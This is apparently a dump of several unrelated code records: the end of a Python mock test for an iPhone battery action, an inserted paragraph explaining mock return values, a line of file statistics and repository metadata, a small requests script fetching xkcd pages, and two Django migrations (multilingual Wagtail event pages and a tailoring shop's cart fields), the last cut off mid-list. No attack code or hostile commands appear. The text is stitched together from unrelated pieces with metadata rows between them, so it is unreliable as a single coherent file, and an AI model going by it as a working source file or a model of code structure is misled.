m_device_name = 'm_name'
m_device.status.return_value = {
'deviceDisplayName': 'iPhone',
'batteryLevel': m_battery_level,
'name': m_device_name,
}
from melissa.actions.find_iphone import iphone_battery
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
m_pc_service.return_value.devices = [m_device]
# run the func
iphone_battery(m_text)
# testing.
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_once_with(m_tts_expected_arg)
assert m_device.status.call_count == 2
m_device.status.assert_called_with()
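The tests above repeatedly set `return_value` attributes on `mock.Mock()` objects and then verify calls with `assert_called_once_with`. A minimal self-contained sketch of that pattern, using a hypothetical `fetch_status` function (not part of the suite above) to show how chained `return_value` attributes stub out nested calls:

```python
from unittest import mock

# Hypothetical function under test: calls client.get(...) and
# then .json() on the response, just as production code might.
def fetch_status(client):
    return client.get('/status').json()

m_client = mock.Mock()
# Chained return_value: client.get(...) -> response; response.json() -> dict.
m_client.get.return_value.json.return_value = {'ok': True}

result = fetch_status(m_client)
m_client.get.assert_called_once_with('/status')
```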
| 42.031847 | 77 | 0.642522 | 823 | 6,599 | 4.81288 | 0.132442 | 0.118657 | 0.086342 | 0.115122 | 0.838677 | 0.80409 | 0.763949 | 0.746024 | 0.746024 | 0.703105 | 0 | 0.003958 | 0.272466 | 6,599 | 156 | 78 | 42.301282 | 0.821079 | 0.098348 | 0 | 0.572727 | 0 | 0 | 0.163555 | 0.094708 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.063636 | false | 0.109091 | 0.118182 | 0 | 0.190909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
94199ba89ec1ad661777b664016bc5e6b33877a2 | 539 | py | Python | requests_examples/basic_example.py | MKaczkow/python_concepts | 2afd1782b75003bbb9474edf2fb0d0f86b024ce0 | [
"MIT"
] | null | null | null | requests_examples/basic_example.py | MKaczkow/python_concepts | 2afd1782b75003bbb9474edf2fb0d0f86b024ce0 | [
"MIT"
] | null | null | null | requests_examples/basic_example.py | MKaczkow/python_concepts | 2afd1782b75003bbb9474edf2fb0d0f86b024ce0 | [
"MIT"
] | null | null | null | import requests as req
def main():
    # basic GET request and response; stream=True keeps r.raw unconsumed
    r = req.get('https://xkcd.com/353/', stream=True)
    # print(r.text)
    print(r.url)
    # print(r.encoding)
    # print(r.content)
    # print(r.json())
    print(r.raw)
    print(r.raw.read(10))

    # a second GET request and response
    r = req.get('https://xkcd.com/327/', stream=True)
    # print(r.text)
    print(r.url)
    # print(r.encoding)
    # print(r.content)
    # print(r.json())
    print(r.raw)
    print(r.raw.read(10))


if __name__ == "__main__":
    main()
# Generated by Django 2.0.5 on 2018-06-13 18:26
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import home.models
import modelcluster.fields
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.documents.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
initial = True
dependencies = [
('wagtailcore', '0040_page_draft_title'),
('wagtailimages', '0019_delete_filter'),
]
operations = [
migrations.CreateModel(
name='EventIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('heading', models.CharField(blank=True, max_length=255, null=True)),
('heading_en', models.CharField(blank=True, max_length=255, null=True)),
('heading_fr', models.CharField(blank=True, max_length=255, null=True)),
('heading_es', models.CharField(blank=True, max_length=255, null=True)),
('heading_pt', models.CharField(blank=True, max_length=255, null=True)),
('excerpt', models.TextField(blank=True, null=True)),
('excerpt_en', models.TextField(blank=True, null=True)),
('excerpt_fr', models.TextField(blank=True, null=True)),
('excerpt_es', models.TextField(blank=True, null=True)),
('excerpt_pt', models.TextField(blank=True, null=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='EventPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('heading', models.CharField(blank=True, max_length=255, null=True)),
('heading_en', models.CharField(blank=True, max_length=255, null=True)),
('heading_fr', models.CharField(blank=True, max_length=255, null=True)),
('heading_es', models.CharField(blank=True, max_length=255, null=True)),
('heading_pt', models.CharField(blank=True, max_length=255, null=True)),
('excerpt', models.TextField(blank=True, null=True)),
('excerpt_en', models.TextField(blank=True, null=True)),
('excerpt_fr', models.TextField(blank=True, null=True)),
('excerpt_es', models.TextField(blank=True, null=True)),
('excerpt_pt', models.TextField(blank=True, null=True)),
('content_editor', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('content_editor_en', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('content_editor_fr', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('content_editor_es', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('content_editor_pt', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('date_start', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Event start date and time')),
('date_end', models.DateTimeField(blank=True, null=True, verbose_name='Event end date and time')),
('location', models.TextField(blank=True, null=True)),
('registration_link', models.URLField(blank=True, max_length=255, null=True)),
('additional_information', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('additional_information_en', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('additional_information_fr', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('additional_information_es', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
('additional_information_pt', wagtail.core.fields.StreamField((('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('image_figure', wagtail.core.blocks.StructBlock((('image', wagtail.images.blocks.ImageChooserBlock()), ('alignment', home.models.ImageAlignmentChoiceBlock()), ('caption', wagtail.core.blocks.RichTextBlock(required=False))), icon='image', label='Image figure')), ('pullquote', wagtail.core.blocks.StructBlock((('quote', wagtail.core.blocks.TextBlock('quote title')),))), ('aligned_html', wagtail.core.blocks.StructBlock((('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', home.models.HTMLAlignmentChoiceBlock())), icon='code', label='Raw HTML')), ('document_box', wagtail.core.blocks.StreamBlock((('document_box_heading', wagtail.core.blocks.CharBlock(classname='title', help_text='Only one heading per box.', icon='title', required=False)), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse', required=False))), icon='doc-full-inverse')), ('anchor_point', wagtail.core.blocks.CharBlock(help_text='Custom anchor points are expected to precede other content.', icon='order-down'))), blank=True, null=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='EventType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, unique=True)),
('name_en', models.CharField(max_length=255, null=True, unique=True)),
('name_fr', models.CharField(max_length=255, null=True, unique=True)),
('name_es', models.CharField(max_length=255, null=True, unique=True)),
('name_pt', models.CharField(max_length=255, null=True, unique=True)),
('slug', models.SlugField(unique=True)),
],
),
migrations.CreateModel(
name='FeaturedEvent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='events.EventPage')),
],
),
migrations.AddField(
model_name='eventpage',
name='event_type',
field=modelcluster.fields.ParentalManyToManyField(blank=True, to='events.EventType'),
),
migrations.AddField(
model_name='eventpage',
name='feed_image',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image'),
),
]
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import wap.models
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Address4Order',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('recipient', models.CharField(max_length=128, null=True, verbose_name=b'\xe6\x94\xb6\xe4\xbb\xb6\xe4\xba\xba', blank=True)),
('phone', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe6\x94\xb6\xe4\xbb\xb6\xe4\xba\xba\xe7\x94\xb5\xe8\xaf\x9d', blank=True)),
('address_region', models.CharField(default=b'', max_length=64, null=True, verbose_name=b'\xe6\x89\x80\xe5\x9c\xa8\xe5\xb8\x82\xe5\x8c\xba', blank=True)),
('address_street', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe8\xa1\x97\xe9\x81\x93\xe8\xaf\xa6\xe7\xbb\x86\xe5\x9c\xb0\xe5\x9d\x80', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
],
options={
'verbose_name': '\u7528\u6237\u5e38\u7528\u8ba2\u5355\u5730\u5740',
'verbose_name_plural': '\u7528\u6237\u5e38\u7528\u8ba2\u5355\u5730\u5740',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Banner',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(default=b'', max_length=256, verbose_name=b'\xe5\x90\x8d\xe7\xa7\xb0')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('img', models.ImageField(upload_to=wap.models.get_uploadto_path, null=True, verbose_name=b'\xe5\xb1\x95\xe7\xa4\xba\xe5\x9b\xbe', blank=True)),
('type', models.CharField(default=b'', max_length=10, null=True, verbose_name=b'\xe5\xb1\x95\xe7\xa4\xba\xe5\x9b\xbe\xe7\xb1\xbb\xe5\x9e\x8b', blank=True)),
('img_href', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe5\xa4\x96\xe9\x83\xa8\xe8\xb6\x85\xe9\x93\xbe\xe6\x8e\xa5', blank=True)),
],
options={
'verbose_name': '\u5c55\u793a\u56fe',
'verbose_name_plural': '\u5c55\u793a\u56fe',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Cart',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('price', models.FloatField(default=0, null=True, verbose_name=b'\xe4\xbb\xb7\xe6\xa0\xbc', blank=True)),
('is4friend', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe4\xb8\xba\xe9\x87\x8d\xe8\xa7\x86\xe7\x9a\x84\xe4\xba\xba\xe5\xae\x9a\xe5\x88\xb6')),
('friend_phone', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe6\x9c\x8b\xe5\x8f\x8b\xe7\x94\xb5\xe8\xaf\x9d', blank=True)),
('create_time', models.DateTimeField(auto_now=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('kouxing_sy', models.CharField(default=b'', choices=[(b'1', b'1'), (b'2', b'2'), (b'3', b'3'), (b'2*1', b'2*1'), (b'4*2', b'4*2'), (b'6*2', b'6*2')], max_length=16, blank=True, null=True, verbose_name=b'\xe6\x89\xa3\xe5\x9e\x8b\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('lingxing_sy', models.CharField(default=b'', choices=[(b'\xe5\xb9\xb3\xe9\xa9\xb3\xe5\xa4\xb4', b'\xe5\xb9\xb3\xe9\xa9\xb3\xe5\xa4\xb4'), (b'\xe6\x9e\xaa\xe9\xa9\xb3\xe5\xa4\xb4', b'\xe6\x9e\xaa\xe9\xa9\xb3\xe5\xa4\xb4'), (b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86', b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa2\x86\xe5\x9e\x8b\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('yaodou_sy', models.CharField(default=b'', choices=[(b'\xe6\x99\xae\xe9\x80\x9a', b'\xe6\x99\xae\xe9\x80\x9a'), (b'\xe6\x96\x9c\xe5\x85\x9c', b'\xe6\x96\x9c\xe5\x85\x9c'), (b'\xe5\x8f\x8c\xe7\x89\x99\xe5\x85\x9c', b'\xe5\x8f\x8c\xe7\x89\x99\xe5\x85\x9c')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\x85\xb0\xe5\x85\x9c\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('kaiqi_sy', models.CharField(default=b'', choices=[(b'\xe5\x90\x8e\xe5\xbc\x80\xe6\xb0\x94', b'\xe5\x90\x8e\xe5\xbc\x80\xe6\xb0\x94'), (b'\xe4\xbe\xa7\xe5\xbc\x80\xe6\xb0\x94', b'\xe4\xbe\xa7\xe5\xbc\x80\xe6\xb0\x94'), (b'\xe6\x97\xa0', b'\xe6\x97\xa0')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\xbc\x80\xe6\xb0\x94\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('xiukou_sy', models.CharField(default=b'', choices=[(b'3', b'3'), (b'4', b'4')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa2\x96\xe6\x89\xa3\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('neibuzaoxing_sy', models.CharField(default=b'', choices=[(b'\xe6\x97\xb6\xe5\xb0\x9a\xe6\xac\xbe', b'\xe6\x97\xb6\xe5\xb0\x9a\xe6\xac\xbe'), (b'\xe4\xbc\xa0\xe7\xbb\x9f\xe6\xac\xbe', b'\xe4\xbc\xa0\xe7\xbb\x9f\xe6\xac\xbe')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x86\x85\xe9\x83\xa8\xe9\x80\xa0\xe5\x9e\x8b\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('neibudou_sy', models.CharField(default=b'', choices=[(b'\xe9\x87\x8c\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c'), (b'\xe7\xac\x94\xe5\x85\x9c', b'\xe7\xac\x94\xe5\x85\x9c'), (b'\xe7\x83\x9f\xe5\x85\x9c', b'\xe7\x83\x9f\xe5\x85\x9c'), (b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c'), (b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c'), (b'\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c', b'\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c'), (b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c', b'\xe9\x87\x8c\xe5\x85\x9c|\xe7\xac\x94\xe5\x85\x9c|\xe7\x83\x9f\xe5\x85\x9c')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x86\x85\xe9\x83\xa8\xe5\x85\x9c( \xe5\xa4\x9a\xe9\x80\x89\xe7\x94\xa8 \xe2\x80\x98|\xe2\x80\x99 \xe7\xba\xbf\xe5\x88\x86\xe5\x89\xb2)\xef\xbc\x88\xe4\xb8\x8a\xe8\xa1\xa3\xef\xbc\x89')),
('kuzhe_xk', models.CharField(default=b'', choices=[(b'\xe6\x97\xa0\xe8\xa4\xb6', b'\xe6\x97\xa0\xe8\xa4\xb6'), (b'\xe5\x8d\x95\xe8\xa4\xb6', b'\xe5\x8d\x95\xe8\xa4\xb6'), (b'\xe5\x8f\x8c\xe8\xa4\xb6', b'\xe5\x8f\x8c\xe8\xa4\xb6')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa3\xa4\xe8\xa4\xb6\xef\xbc\x88\xe8\xa5\xbf\xe8\xa3\xa4\xef\xbc\x89')),
('houdou_xk', models.CharField(default=b'', choices=[(b'\xe5\x8f\xb3\xe8\xbe\xb9', b'\xe5\x8f\xb3\xe8\xbe\xb9'), (b'\xe4\xb8\xa4\xe8\xbe\xb9', b'\xe4\xb8\xa4\xe8\xbe\xb9')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x90\x8e\xe5\x85\x9c\xef\xbc\x88\xe8\xa5\xbf\xe8\xa3\xa4\xef\xbc\x89')),
('kujiao_xk', models.CharField(default=b'', choices=[(b'\xe5\x86\x85\xe6\x8a\x98\xe8\xbe\xb9', b'\xe5\x86\x85\xe6\x8a\x98\xe8\xbe\xb9'), (b'\xe5\xa4\x96\xe7\xbf\xbb\xe8\xbe\xb9', b'\xe5\xa4\x96\xe7\xbf\xbb\xe8\xbe\xb9')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa3\xa4\xe8\x84\x9a\xef\xbc\x88\xe8\xa5\xbf\xe8\xa3\xa4\xef\xbc\x89')),
('lingxing_cs', models.CharField(default=b'', choices=[(b'\xe6\xa0\x87\xe5\x87\x86', b'\xe6\xa0\x87\xe5\x87\x86'), (b'\xe5\x85\xab\xe5\xad\x97', b'\xe5\x85\xab\xe5\xad\x97'), (b'\xe4\xb8\x80\xe5\xad\x97', b'\xe4\xb8\x80\xe5\xad\x97'), (b'\xe9\xa2\x86\xe5\xb0\x96\xe6\x89\xa3\xe9\xa2\x86', b'\xe9\xa2\x86\xe5\xb0\x96\xe6\x89\xa3\xe9\xa2\x86'), (b'\xe5\xb0\x8f\xe6\x96\xb9\xe9\xa2\x86', b'\xe5\xb0\x8f\xe6\x96\xb9\xe9\xa2\x86'), (b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86', b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa2\x86\xe5\x9e\x8b\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
